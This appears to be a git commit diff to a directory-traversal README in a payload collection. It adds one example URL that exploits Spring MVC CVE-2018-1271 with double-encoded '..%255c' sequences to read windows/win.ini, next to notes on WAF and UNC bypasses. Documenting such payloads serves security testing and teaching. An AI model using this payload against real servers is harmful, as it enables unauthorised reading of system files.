Directory Traversal CVE 2018 Spring

2025-12-12 07:40:34 -08:00 · 2019-07-27 13:02:16 +02:00
parent 98124178db
commit 6baa446144
3 changed files with 9 additions and 3 deletions
--- a/Traversal/README.md
+++ b/Traversal/README.md
@@ -70,6 +70,8 @@ Sometimes you encounter a WAF which remove the "../" characters from the strings
 \ = %255c
 ```

+**e.g:** Spring MVC Directory Traversal Vulnerability (CVE-2018-1271) with `http://localhost:8080/spring-mvc-showcase/resources/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini`
+
 ### UNC Bypass

 An attacker can inject a Windows UNC share ('\\UNC\share\name') into a software system to potentially redirect access to an unintended location or arbitrary file.